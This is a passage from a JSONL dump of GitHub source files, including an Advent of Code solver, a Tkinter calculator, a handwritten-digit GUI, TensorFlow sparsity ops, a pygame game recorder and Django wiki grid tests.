client.run(token)\n","repo_name":"3digitdev/dilbot","sub_path":"src/dilbot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32334642543","text":"from child_sum_tree import ChildSumTree\nimport make_tree\n\n\nif __name__ == \"__main__\":\n tree_model = ChildSumTree()\n tree = make_tree.make_data_tree()\n traversal = tree_model._traversal_tree(tree)\n result = tree_model.compute_tree(tree)\n\n print ('tree 1')\n print ('traversal = ',traversal)\n print ('result = ',result)\n\n tree2 = make_tree.make_data_tree2()\n traversal2 = tree_model._traversal_tree(tree2)\n result2 = tree_model.compute_tree(tree2)\n print ('tree 2')\n print ('traversal 2 = ', traversal2)\n print ('result 2 = ', result2)\n\n","repo_name":"ttpro1995/ChildSumTree","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32748705","text":"# 포도주 시식\n\"\"\"\ndynamic programming\nn >= 3 부터는 n번째 숫자가 첫 번째가 되는지 두 번째가 되는지 세 번째가 되는지 경우의 수로 나누어서 확인\nif n >= 3:\n # n번째 숫자가 첫 번째인 경우, 두 번째인 경우, 세 번째인 경우\n dp[n] = max(data[n] + dp[n-2], data[n] + data[n-1] + dp[n-3], dp[i-1])\n\"\"\"\nimport sys\n\nsys.stdin = open('C:\\github\\Algorithm\\Dynamic-Programming\\input.txt', 'rt')\n\nn = int(input())\ndata = [0] # 인덱스 1부터 시작\nfor _ in range(n):\n data.append(int(input()))\n\ndp = [0] * (n+1)\ndp[1] = data[1]\nif n >= 2:\n dp[2] = data[1] + data[2]\n\n for i in range(3, n+1):\n case_1 = data[i] + dp[i-2]\n case_2 = data[i] + data[i-1] + dp[i-3]\n case_3 = dp[i-1]\n dp[i] = max(case_1, case_2, 
case_3)\n\nprint(max(dp))\n","repo_name":"limgeonho/Algorithm-1","sub_path":"BOJ/Dynamic-Programming/[BOJ]2156.py","file_name":"[BOJ]2156.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37915604533","text":"\"\"\"AoC 8, 2021\"\"\"\n\n# Standard library imports\nimport pathlib\nimport sys\nfrom aocd import data, submit\nfrom dataclasses import dataclass\nfrom collections import defaultdict\n\n\n@dataclass\nclass DigitDisplay:\n \"\"\"Class to represent a digital display.\n\n 0: 1: 2: 3: 4:\n aaaa .... aaaa aaaa ....\n b c . c . c . c b c\n b c . c . c . c b c\n .... .... dddd dddd dddd\n e f . f e . . f . f\n e f . f e . . f . f\n gggg .... gggg gggg ....\n\n 5: 6: 7: 8: 9:\n aaaa aaaa aaaa aaaa aaaa\n b . b . . c b c b c\n b . b . . c b c b c\n dddd dddd .... dddd dddd\n . f e f . f e f . f\n . f e f . f e f . f\n gggg gggg .... gggg gggg\n \"\"\"\n\n digits: dict\n\n def __init__(self):\n self.digits = {}\n\n def add_digit(self, segments: str) -> None:\n sorted_segment = str(sorted(segments))\n if len(segments) == 2:\n self.digits[1] = set(segments)\n self.digits[sorted_segment] = 1\n elif len(segments) == 3:\n self.digits[7] = set(segments)\n self.digits[sorted_segment] = 7\n elif len(segments) == 4:\n self.digits[4] = set(segments)\n self.digits[sorted_segment] = 4\n elif len(segments) == 7:\n self.digits[8] = set(segments)\n self.digits[sorted_segment] = 8\n\n def decode_segment(self, segments: set) -> int:\n \"\"\"Decode segment.\"\"\"\n all_segments = self.digits[8]\n unknown_segments = set(segments)\n extra_segments = all_segments - unknown_segments\n ret = None\n if len(extra_segments) == 1: # either a 0/6/9\n if len(extra_segments - self.digits[4]) == 1: # must be a 9\n ret = 9\n elif len(extra_segments - self.digits[1]) == 0: # must be a 6\n ret = 6\n else: # must be a 0\n ret = 0\n elif len(extra_segments) == 2: # either a 2/3/5\n if len(extra_segments - self.digits[1]) == 2: # must be a 3\n ret = 3\n elif len(extra_segments - self.digits[4]) == 1: # must be a 5\n ret = 5\n else:\n ret = 2\n return ret\n\n def convert_digit(self, segments: str) -> int:\n sorted_segment = str(sorted(segments))\n if sorted_segment in self.digits:\n return self.digits[sorted_segment]\n else:\n digit = self.decode_segment(set(segments))\n self.digits[sorted_segment] = digit\n self.digits[digit] = set(segments)\n return digit\n\n\ndef parse(puzzle_input):\n \"\"\"Parse input\"\"\"\n output = []\n # This could be a list comprehension but :shrug:\n for entry in puzzle_input.splitlines():\n signal_pattern, output_value = entry.split(\"|\")\n signal_pattern = signal_pattern.strip().split(\" \")\n output_value = output_value.strip().split(\" \")\n output.append((signal_pattern, output_value))\n return output\n\n\ndef part1(data):\n \"\"\"Solve part 1.\n Because the digits 1, 4, 7, and 8 each use a unique number of segments, you should be able to tell which\n combinations of signals correspond to those digits. 
Counting only digits in the output values (the part after | on\n each line), in the above example, there are 26 instances of digits that use a unique number of segments (highlighted\n above).\n \"\"\"\n total_unique_digits = 0\n for entry in data:\n signal_pattern, output_value = entry\n for digit in output_value:\n if len(digit) in (2, 3, 4, 7):\n total_unique_digits += 1\n return total_unique_digits\n\n\ndef part2(data):\n \"\"\"Solve part 2\"\"\"\n total_digits = 0\n for entry in data:\n signal_pattern, output_value = entry\n decoder = DigitDisplay()\n for digit in signal_pattern:\n if len(digit) in (2, 3, 4, 7):\n decoder.add_digit(digit)\n for digit in output_value:\n if len(digit) in (2, 3, 4, 7):\n decoder.add_digit(digit)\n decoder_digits = \"\"\n for digit in output_value:\n decoder_digits += str(decoder.convert_digit(digit))\n total_digits += int(decoder_digits)\n return total_digits\n\n\ndef solve(puzzle_input):\n \"\"\"Solve the puzzle for the given input\"\"\"\n data = parse(puzzle_input)\n solution1 = part1(data)\n solution2 = part2(data)\n\n return solution1, solution2\n\n\nif __name__ == \"__main__\":\n answer_a, answer_b = solve(puzzle_input=data)\n if answer_a:\n submit(answer_a, part=\"a\")\n if answer_b:\n submit(answer_b, part=\"b\")\n","repo_name":"jokajak/advent_of_code","sub_path":"2021/08/aoc202108.py","file_name":"aoc202108.py","file_ext":"py","file_size_in_byte":4842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"17513315585","text":"import sys\nimport curses\nfrom curses.textpad import rectangle\n\nclass Board(object):\n def __init__(self, stdscr):\n self.stdscr = stdscr\n self.Y, self.X = self.stdscr.getmaxyx()\n self.Y = self.Y - 1\n self.X = self.X - 1\n\n def show(self, state):\n cell_len = len(state)\n cell_Y = self.Y // cell_len\n cell_X = self.X // cell_len\n for i in range(cell_len):\n uly, lry = i * cell_Y, (i + 1) * cell_Y\n for j in range(cell_len):\n ulx, lrx = j * cell_X, (j + 1) * cell_X\n rectangle(self.stdscr, uly, ulx, lry, lrx)\n str_cell = str(state[i][j])\n ty = (uly + lry) // 2\n tx = (ulx + lrx - len(str_cell)) // 2 + 1\n self.stdscr.addstr(ty, tx, str_cell)\n self.stdscr.refresh()\n","repo_name":"chengui/python-samples","sub_path":"term-2048/tui2048/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15914123956","text":"import torch.nn as nn\nfrom torch.nn.modules.dropout import _DropoutNd\n\n\ndef _set_dropout_to_train_mode(m: nn.Module) -> None:\n if isinstance(m, _DropoutNd):\n m.train()\n\n\ndef set_model_to_mode(classifier: nn.Module, mode: str) -> None:\n if mode == \"train\":\n classifier.train()\n elif mode == \"eval\":\n classifier.eval()\n # Only set dropout to training mode (for test time dropout)\n if getattr(classifier, \"mc_dropout\", 0.0) > 0:\n classifier.apply(_set_dropout_to_train_mode)\n else:\n raise ValueError(f\"Unknown mode '{mode}'\")\n","repo_name":"RonMcKay/UQGAN","sub_path":"cls_models/cls_utils.py","file_name":"cls_utils.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"74631130320","text":"# Tkinter Calculator Program\n# 03/02/2021\n\nfrom tkinter import *\n\nwindow = Tk()\n\nwindow.title(\"Curtis' Calculator\")\n\nwindow.geometry('250x100')\n\nlbl1 = Label(window, text=\"Number 1\")\nlbl1.grid(column=0, 
row=0)\n\nlbl2 = Label(window, text=\"Number 2\")\nlbl2.grid(column=0, row=1)\n\nnum1 = Entry(window,width=10)\nnum1.grid(column=1, row=0)\n\nnum2 = Entry(window,width=10)\nnum2.grid(column=1, row=1)\n\ndef clicked():\n answer = Label(window, text=\"Answer: \" + str(int(num1.get()) + int(num2.get())))\n answer.grid(column=0, row=3)\n\nbtn = Button(window, text=\"Add Numbers\", command=clicked)\nbtn.grid(column=2, row=0)\n\nwindow.mainloop()","repo_name":"Curtis73/ALevel-ComputerScience","sub_path":"Tkinter Calculator.py","file_name":"Tkinter Calculator.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38050760805","text":"\nimport cv2 as cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom PIL import Image\nfrom tensorflow.keras.preprocessing import image\nimport tensorflow as tf\nfrom tkinter import *\nimport tkinter as tk\nimport win32gui\nfrom PIL import ImageGrab, Image\n\n\n\n\n\n#load the model\nmodel = tf.keras.models.load_model('model') \n\n\ndef processs(img):\n images=[]\n cv2.imwrite('5.png',np.float32(img)) #SAVE THE IMAGE\n col = Image.open('5.png') # READ THE IMAGE\n gray = col.convert('L') #CONVERT THE IMAGE\n bw = gray.point(lambda x: 0 if x<100 else 255, '1')\n bw.save('5.png')\n\n img = cv2.imread('5.png',cv2.IMREAD_GRAYSCALE) #READ THE IMAGE \n img = cv2.bitwise_not(img)\n img_size = 28\n img = cv2.resize(img, (img_size,img_size))\n finalIMAGE = tf.keras.utils.normalize(img, axis = 1)\n images.append(finalIMAGE)\n npa = np.asarray(images, dtype=np.float32)\n npa = npa.reshape(npa.shape[0], 28, 28, 1)\n predictions = model.predict(npa)\n print(np.argmax(predictions[0]))\n print(predictions[0])\n return np.argmax(predictions[0]),max (predictions)\n\n\n\n\nclass App(tk.Tk):\n def __init__(self):\n tk.Tk.__init__(self)\n self.x = self.y = 0\n # Creating elements\n self.canvas = tk.Canvas(self, width=200, height=200, bg = \"white\", cursor=\"cross\")\n self.label = tk.Label(self, text=\"Thinking..\", font=(\"Helvetica\", 48))\n self.classify_btn = tk.Button(self, text = \"Recognize\", command = self.classify_handwriting) \n self.button_clear = tk.Button(self, text = \"Clear\", command = self.clear_all)\n # Grid structure\n self.canvas.grid(row=0, column=0, pady=2, sticky=W, )\n self.label.grid(row=0, column=1,pady=2, padx=2)\n self.classify_btn.grid(row=1, column=1, pady=2, padx=2)\n self.button_clear.grid(row=1, column=0, pady=2)\n #self.canvas.bind(\"\", self.start_pos)\n self.canvas.bind(\"\", self.draw_lines)\n def clear_all(self):\n self.canvas.delete(\"all\")\n def classify_handwriting(self):\n HWND = self.canvas.winfo_id() # get the handle of the canvas\n rect = win32gui.GetWindowRect(HWND) # get the coordinate of the canvas\n im = ImageGrab.grab(rect)\n digit, acc = processs(im)\n\n self.label.configure(text= str(digit))\n def draw_lines(self, event):\n self.x = event.x\n self.y = event.y\n r=15\n self.canvas.create_oval(self.x-r, self.y-r, self.x + r, self.y + r, fill='black',width=0)\napp = App()\nmainloop()\n\n\n\n \n\n \n\n\n\n","repo_name":"abdulrahmanRAIES/Handwritten-Digit-Recognition-using-python-CNN","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"18828650350","text":"import tensorflow as tf\n\n\ndef random_binary_mask(tensor_shape, false_percentage, strict=True):\n if not strict:\n binary_mask 
= tf.random.uniform(tensor_shape) > false_percentage\n else:\n binary_mask = tf.reshape(\n tf.random.shuffle(tf.linspace(0.0, 1.0, tf.reduce_prod(tensor_shape)))\n > false_percentage,\n tensor_shape,\n )\n return binary_mask\n\n\ndef kwinner_mask(inputs, k):\n vals, _ = tf.math.top_k(inputs, k=k)\n kth_elems = tf.reduce_min(vals, axis=-1, keepdims=True)\n boolean_mask = tf.greater_equal(inputs, kth_elems)\n return boolean_mask\n\n\ndef flat_kwinner_mask(inputs, k):\n if len(inputs.shape) > 2:\n input_shape_batchless = inputs.shape[1:].as_list()\n flat_input = tf.reshape(inputs, (-1, tf.reduce_prod(input_shape_batchless)))\n boolean_mask = kwinner_mask(flat_input, k)\n return tf.reshape(boolean_mask, (-1, *input_shape_batchless))\n else:\n return kwinner_mask(inputs, k)\n\n\ndef add_noise(img, eta, strict=True):\n noise_val = tf.reduce_mean(img) + 2 * tf.math.reduce_std(img)\n binary_mask = random_binary_mask(img.shape, eta, strict)\n return tf.where(binary_mask, img, noise_val)\n","repo_name":"water-vapor/how-can-we-be-so-dense-tensorflow","sub_path":"ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"71955992403","text":"import os, cv2, time\nimport queue\nimport sys\nfrom multiprocessing import Process, Queue\nimport numpy as np\nimport pygame\nfrom tools import video_writer, send_surface, receive_surface\n\n## Define keyboard Macros as sets\nTEAM1_PLAYER1_HIT = {'w'}\nTEAM1_PLAYER1_SINK = {'e'}\nTEAM1_PLAYER1_MISS = {'r'}\nTEAM1_PLAYER1_DROP = {'t'}\n\nTEAM1_PLAYER2_HIT = {'z'}\nTEAM1_PLAYER2_SINK = {'x'}\nTEAM1_PLAYER2_MISS = {'c'}\nTEAM1_PLAYER2_DROP = {'v'}\n\nTEAM2_PLAYER1_HIT = {'u'}\nTEAM2_PLAYER1_SINK = {'i'}\nTEAM2_PLAYER1_MISS = {'o'}\nTEAM2_PLAYER1_DROP = {'p'}\n\nTEAM2_PLAYER2_HIT = {'n'}\nTEAM2_PLAYER2_SINK = {'m'}\nTEAM2_PLAYER2_MISS = {','}\nTEAM2_PLAYER2_DROP = {'.'}\n\nREPLAY ={'s'}\nBACKSPACE_KEY = ord('\\x08') # or simply 8\nBACKSPACE_KEY_MAC = 127\n\nQuit = {'escape'}\n\n\nandrew_url = \"http://admin:4647@andrew.local:8081/video\"\n\nclass SnappaWindow:\n def __init__(self, stream_url=None, team_info=None, debug=False):\n # All your initialization code...\n self.stream_url = stream_url\n\n # Initialize the camera\n self.cap = self.initialize_camera(self.stream_url)\n if self.cap:\n self.frame_width = int(self.cap.get(3))\n self.frame_height = int(self.cap.get(4))\n else:\n self.frame_width = 640\n self.frame_height = 480\n\n self.screen = pygame.display.set_mode((self.frame_width, self.frame_height), pygame.RESIZABLE)\n self.clock = pygame.time.Clock()\n\n\n # Add other initializations as necessary...\n # Path where videos are stored\n self.root_video_path = 'videos/'\n # Timestamp for the video\n self.timestamp = time.strftime(\"%Y%m%d-%H%M%S\")\n # Filename for the video\n self.filename = f'Game_{self.timestamp}/'\n self.full_video_path = self.root_video_path + self.filename\n self.full_video_name = self.full_video_path + 'full_game.avi'\n\n # Check if those directory exists, if not create them\n if not os.path.exists(self.root_video_path):\n os.makedirs(self.root_video_path)\n if not os.path.exists(self.full_video_path):\n os.makedirs(self.full_video_path)\n\n # Define the codec and create VideoWriter object\n # self.fourcc = cv2.VideoWriter_fourcc(*'XVID')\n self.frame_rate = self.cap.get(cv2.CAP_PROP_FPS) or 30 # default to 30 FPS if not provided\n # self.out_full = cv2.VideoWriter(self.full_video_name, self.fourcc, self.frame_rate,\n # 
(self.frame_width, self.frame_height))\n\n print(self.frame_rate)\n\n # Create a queue for the video writer\n self.output_queue = Queue()\n\n self.writer_process = Process(target=video_writer, args=(self.output_queue, self.full_video_name, (self.frame_width, self.frame_height), self.frame_rate))\n self.writer_process.start()\n\n # Create a queue for the clip_buffer\n self.replay_duration = 5\n self.clip_buffer = Queue()\n self.replay_mode = False\n self.clip_buffer_size = 0\n\n\n # Time and team\n self.elapsed_time = 0\n if not team_info:\n team_info = {\n 'Team1': {\n 'TeamName': \"Messy Room\",\n 'PlayerOne': {'PlayerName': \"Trey\", 'Hits': 0, 'Misses': 0, 'Sinks': 0, 'Drops': 0, 'Stats': 0.0},\n 'PlayerTwo': {'PlayerName': \"James\", 'Hits': 0, 'Misses': 0, 'Sinks': 0, 'Drops': 0, 'Stats': 0.0},\n 'TeamPoints': 0\n },\n 'Team2': {\n 'TeamName': \"Ragno Club\",\n 'PlayerOne': {'PlayerName': \"Ben\", 'Hits': 0, 'Misses': 0, 'Sinks': 0, 'Drops': 0, 'Stats': 0.0},\n 'PlayerTwo': {'PlayerName': \"Colin\", 'Hits': 0, 'Misses': 0, 'Sinks': 0, 'Drops': 0, 'Stats': 0.0},\n 'TeamPoints': 0\n }\n }\n\n self.team_info = team_info\n\n pygame.font.init()\n self.font = pygame.font.Font(None, 36) # Font for FPS display\n\n self.screen_info = pygame.display.Info()\n self.screen_width = self.screen_info.current_w\n self.screen_height = self.screen_info.current_h\n print(f\"Screen width: {self.screen_width}, Screen height: {self.screen_height}\")\n\n\n\n self.debug = debug\n def initialize_camera(self, url):\n if url:\n for i in range(5):\n cap = cv2.VideoCapture(url)\n if cap.isOpened():\n return cap\n else:\n time.sleep(1)\n print(f\"Failed to connect to camera, retrying {i + 1}/5\")\n\n print(\"Trying built in camera\")\n cap = cv2.VideoCapture(0) # 0 for the default camera, change if you have multiple cameras\n if cap.isOpened():\n return cap\n\n return None\n\n\n def draw_scoreboard_pygame(self, team_info, elapsed_time):\n w, h = self.screen.get_size()\n\n # Define properties of the scoreboard\n height = h // 8\n color = (155, 50, 42)\n\n # Create a semi-transparent rectangle (overlay) for the scoreboard\n overlay = pygame.Surface((w, height))\n overlay.set_alpha(180) # Alpha value\n overlay.fill(color)\n self.screen.blit(overlay, (0, h - height))\n\n # Define font and colors\n font_size = int(min(w/1.2, h) / 30) # Adjust based on the look\n font = pygame.font.Font(pygame.font.get_default_font(), font_size)\n header_color = (255, 255, 255)\n text_color = (168, 224, 58)\n\n left_position = int(w * 0.01)\n right_position = int(w * 0.55)\n\n # Draw Team's info for both teams\n for team, data in team_info.items():\n vertical_position = h - height + font_size / 10 # Reset the vertical position for each team\n # Team's Name and Points\n team_text = f\"{data['TeamName']} - {data['TeamPoints']} Points\"\n text_surface = font.render(team_text, True, header_color)\n if team == 'Team1':\n position = (left_position, vertical_position)\n else:\n position = (w - text_surface.get_width() - left_position, vertical_position)\n self.screen.blit(text_surface, position)\n vertical_position += font_size * 1.2 # Adjust for spacing\n\n # Draw Players' stats\n for player in ['PlayerOne', 'PlayerTwo']:\n player_info = data[player]\n formatted_stats = \"{:+.2f}\".format(player_info[\"Stats\"])\n player_text = f\"{player_info['PlayerName']} | {formatted_stats} H: {player_info['Hits']} M: {player_info['Misses']} S: {player_info['Sinks']} D: {player_info['Drops']}\"\n text_surface = font.render(player_text, True, 
text_color)\n\n if team == 'Team1':\n player_text = f\"H: {player_info['Hits']} M: {player_info['Misses']} S: {player_info['Sinks']} D: {player_info['Drops']} {formatted_stats} | {player_info['PlayerName']}\"\n position = (left_position, vertical_position)\n text_surface = font.render(player_text, True, text_color)\n\n else:\n position = (w - text_surface.get_width() - left_position, vertical_position)\n\n\n self.screen.blit(text_surface, position)\n vertical_position += font_size * 1.2\n\n # Display elapsed time at the bottom center\n time_surface = font.render(elapsed_time, True, header_color)\n time_position = (w // 2 - time_surface.get_width() // 2, h - font_size)\n self.screen.blit(time_surface, time_position)\n\n def resize_frame(self, frame):\n aspect_ratio = self.frame_width / self.frame_height\n width = self.screen_width\n height = self.screen_height\n # Calculate the new dimensions preserving aspect ratio\n if width / height < aspect_ratio: # Screen is \"shorter\" in aspect ratio than video\n new_width = width\n new_height = int(new_width / aspect_ratio)\n else:\n new_height = height\n new_width = int(new_height * aspect_ratio)\n\n # Resize the frame to the new dimensions\n frame_resized = cv2.resize(frame, (new_width, new_height))\n\n # Create a black background\n background = np.zeros((height, width, 3), dtype=np.uint8)\n\n # Overlay the resized frame onto the black background\n y_offset = (height - new_height) // 2\n x_offset = (width - new_width) // 2\n background[y_offset:y_offset + new_height, x_offset:x_offset + new_width] = frame_resized\n\n return background\n\n def process_frame_cv2(self, frame):\n # All processing on the frame...\n # Orentation, cropping, etc...\n frame = cv2.flip(frame, 1)\n\n # Like drawing the scoreboard and any overlays...\n #frame = self.draw_scoreboard(frame, self.team_info, self.elapsed_time)\n\n\n # Resize the frame to fit the screen\n frame = self.resize_frame(frame)\n\n\n\n return frame\n\n\n\n def process_frame_pygame(self):\n # All processing on the frame...\n self.draw_scoreboard_pygame(self.team_info, self.elapsed_time)\n\n if self.debug:\n # Display FPS\n fps = int(self.clock.get_fps())\n fps_text = self.font.render(f\"FPS: {fps}\", True, (255, 255, 255))\n\n # Set the coordinates to (0, 0) to position in the top-left corner\n self.screen.blit(fps_text, (0, 0))\n\n def mainloop(self):\n try:\n running = True\n start_time = time.time()\n replay_frames = 0\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n # Add other events like keypresses...\n elif event.type == pygame.VIDEORESIZE:\n self.screen_width = event.w\n self.screen_height = event.h\n self.screen = pygame.display.set_mode((self.screen_width, self.screen_height), pygame.RESIZABLE)\n\n\n # Check if key Quit was pressed\n elif event.type == pygame.KEYDOWN:\n key = pygame.key.name(event.key)\n if key in Quit:\n running = False\n\n elif key in REPLAY:\n print(\"Replay mode\")\n self.replay_mode = True\n\n\n\n\n ret, frame = self.cap.read()\n\n if not ret:\n print(\"Failed to grab frame\")\n break\n\n # Get the time elapsed\n elapsed_time_sec = int(time.time() - start_time)\n self.elapsed_time = f\"{elapsed_time_sec // 60:02d}:{elapsed_time_sec % 60:02d}\" # Convert to MM:SS format\n\n # Draw the scoreboard\n frame = self.process_frame_cv2(frame)\n\n # Convert to RGB and transpose\n frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frame_rgb_transposed = np.transpose(frame_rgb, (1, 0, 2))\n frame_surface = 
pygame.surfarray.make_surface(frame_rgb_transposed)\n\n # Display the frame\n self.screen.blit(frame_surface, (0, 0))\n\n\n\n self.process_frame_pygame()\n # 3. Put the Frame in the Buffer for the Video Writer\n self.output_queue.put(send_surface(pygame.display.get_surface()))\n self.clip_buffer.put(send_surface(pygame.display.get_surface()))\n self.clip_buffer_size += 1\n\n if self.replay_mode:\n\n try:\n frame = receive_surface(self.clip_buffer.get(block=False))\n self.screen.blit(frame, (0, 0))\n replay_frames += 1\n\n except queue.Empty:\n self.replay_mode = False\n replay_frames = 0\n\n else:\n while self.clip_buffer_size > self.replay_duration * self.frame_rate:\n try:\n self.clip_buffer.get(block=False)\n self.clip_buffer_size -= 1\n except queue.Empty:\n break\n\n\n\n\n # Update the display\n pygame.display.flip()\n\n\n # Limit the frame rate\n self.clock.tick(self.frame_rate + 1)\n\n\n\n\n\n except KeyboardInterrupt:\n pass\n\n finally:\n print(\"Cleaning up\")\n self.cleanup()\n\n def cleanup(self):\n print(\"Initiating cleanup...\")\n self.output_queue.put(None)\n\n self.writer_process.join()\n print(\"Writer process joined\")\n self.writer_process.terminate()\n\n\n # Close the queues properly\n self.output_queue.close()\n self.clip_buffer.close()\n print(\"Queues closed\")\n\n self.cap.release()\n print(\"Camera released\")\n pygame.quit()\n print(\"Pygame quit\")\n sys.exit()\n\n\n\nif __name__ == \"__main__\":\n\n game = SnappaWindow(debug=False, stream_url=\"http://192.168.1.2:8080/video\")\n game.mainloop()","repo_name":"Neeeser/SnappaReplay","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":13337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29031774537","text":"\nimport datetime\nimport time\n\nimport pytz\n\nfrom wiki.grids.models import Grid\nfrom wiki.grids.utils import insert_rows\nfrom wiki.grids.utils.base import HASH_KEY\nfrom wiki.notifications.generators.base import EventTypes\nfrom wiki.notifications.models import PageEvent\nfrom wiki.org import get_org\nfrom wiki.pages.models import Revision\nfrom intranet.wiki.tests.wiki_tests.unit_unittest.api_frontend.base import BaseGridsTest\nfrom intranet.wiki.tests.wiki_tests.unit_unittest.grids.base import (\n GRID_STRUCTURE,\n GRID_WITHOUT_FIELDS,\n NEW_GRID_STRUCTURE,\n)\n\n\nclass ModelsGridsTest(BaseGridsTest):\n def test_grid_sync_data(self):\n \"\"\"staff fields in data must be updated with \"transformed\" and \"sort\" values\"\"\"\n grid = Grid(\n tag='thasonic/grid7',\n supertag='thasonic/grid7',\n last_author=self.user_thasonic,\n status=1,\n page_type=Grid.TYPES.GRID,\n modified_at=datetime.datetime(2001, 1, 1, tzinfo=pytz.utc),\n org=get_org(),\n )\n grid.save()\n grid.authors.add(self.user_thasonic)\n grid.change_structure(NEW_GRID_STRUCTURE)\n grid.save()\n Revision.objects.create_from_page(grid)\n\n self.client.login('thasonic')\n\n self._add_row(grid.supertag, {'participants': 'chapson', 'date': '2010-10-10'})\n\n updated_grid = Grid.objects.get(id=grid.id)\n self.assertTrue('sort' in updated_grid.access_data[0]['participants'])\n self.assertTrue('transformed' in updated_grid.access_data[0]['participants'])\n self.assertEqual('Anton Chaporgin', updated_grid.access_data[0]['participants']['transformed']['chapson'])\n self.assertEqual('Chaporgin Anton', updated_grid.access_data[0]['participants']['sort'])\n\n self._edit_row(grid.supertag, 1, {'participants': 'kolomeetz', 'date': '2010-10-10'})\n\n updated_grid = 
Grid.objects.get(id=grid.id)\n self.assertEqual('Kolomeetz Konstantin', updated_grid.access_data[0]['participants']['sort'])\n self.assertEqual(\n 'Konstantin Kolomeetz', updated_grid.access_data[0]['participants']['transformed']['kolomeetz']\n )\n\n def test_grid_serialized_properties(self):\n grid = Grid(tag='somewhere', supertag='somewhere')\n grid.change_structure(GRID_STRUCTURE)\n self.assertFalse(bool(grid.access_data), 'No data yet')\n self.assertFalse(bool(grid.access_idx), 'No indexes yet')\n data = {'name': 'Sussex search', 'date': '2011-05-10'}\n\n hash1 = insert_rows(grid, [data], None)[0]\n\n self.assertFalse(len(grid.access_data) != 1, 'Must be one row')\n self.assertFalse(len(grid.access_idx) != 1, 'Must be one index')\n self.assertEqual(0, grid.access_idx[hash1]) # 'Idx must point to 0'\n self.assertEqual({'raw': '2011-05-10'}, grid.access_data[grid.access_idx[hash1]]['date'])\n\n data = {\n 'name': 'iCode',\n 'date': '2011-06-30',\n }\n hash = insert_rows(grid, [data], None, hash1)[0]\n\n self.assertTrue(hash in grid.access_idx) # \"Didn't add hash to index\"\n self.assertEqual(2, len(grid.access_data)) # \"Must be 2 rows\"\n self.assertEqual(0, grid.access_idx[hash1]) # \"First row is not second\"\n self.assertEqual(1, grid.access_idx[hash]) # \"Second row is not second\"\n\n before = dict(grid.access_data[grid.access_idx[hash]])\n grid.change(hash, {'name': 'Yandex SHAD'})\n after = grid.access_data[grid.access_idx[hash]]\n self.assertFalse(after['name'] == before['name'], 'I changed name')\n self.assertTrue(after['date'] == before['date'], 'I did not change date')\n self.assertTrue(len(grid.access_data) == 2, 'Length of data list changed')\n self.assertTrue(len(grid.access_idx) == 2, 'Length of index dictionary changed')\n\n grid.remove([hash])\n self.assertTrue(len(grid.access_data) == 1, 'I removed a row')\n self.assertTrue(len(grid.access_idx) == 1, 'I removed a row')\n self.assertFalse(hash in grid.access_idx, 'I removed this row')\n\n def test_structure_changes(self):\n grid = Grid(supertag='somewhere', tag='somewhere')\n grid.change_structure(GRID_STRUCTURE)\n grid.title = 'Some grid title'\n data = [\n {\n 'name': 'Sussex search',\n 'date': '2011-05-10',\n },\n {'name': 'iCode', 'date': '2011-06-30'},\n ]\n insert_rows(grid, data, None)\n\n structure_updated_at1 = grid.structure_updated_at\n\n grid.change_structure(NEW_GRID_STRUCTURE)\n self.assertEqual(grid.title, 'List of conference', 'Must have changed grid title')\n structure_updated_at2 = grid.structure_updated_at\n self.assertTrue(len(grid.access_data) == 2, 'Grid has two rows')\n self.assertTrue('participants' in grid.access_data[0], \"Grid has field \\\"participants\\\"\")\n self.assertEqual(\n grid.access_data[0]['participants'],\n {'raw': ''},\n \"\\\"participants\\\" is an empty field and must be empty\",\n )\n self.assertTrue(bool(grid.access_data[0]['date']), \"\\\"date\\\" must not be empty\")\n self.assertFalse('name' in grid.access_data[0], \"\\\"name\\\" must not be empty\")\n self.assertNotEqual(structure_updated_at1, structure_updated_at2, 'structure_updated_at must have been changed')\n grid.change_structure(GRID_WITHOUT_FIELDS)\n\n def test_insert_action_POST(self):\n self._create_gorilla_grids()\n\n grid = Grid.objects.get(id=self.grid.id)\n data_updated_at1 = grid.modified_at\n before_pageevent = PageEvent.objects.filter(event_type=EventTypes.edit, page=self.grid).count()\n conf_name = 'Spring of Yandex Input Output'\n\n # wait so that time passes\n time.sleep(1)\n\n 
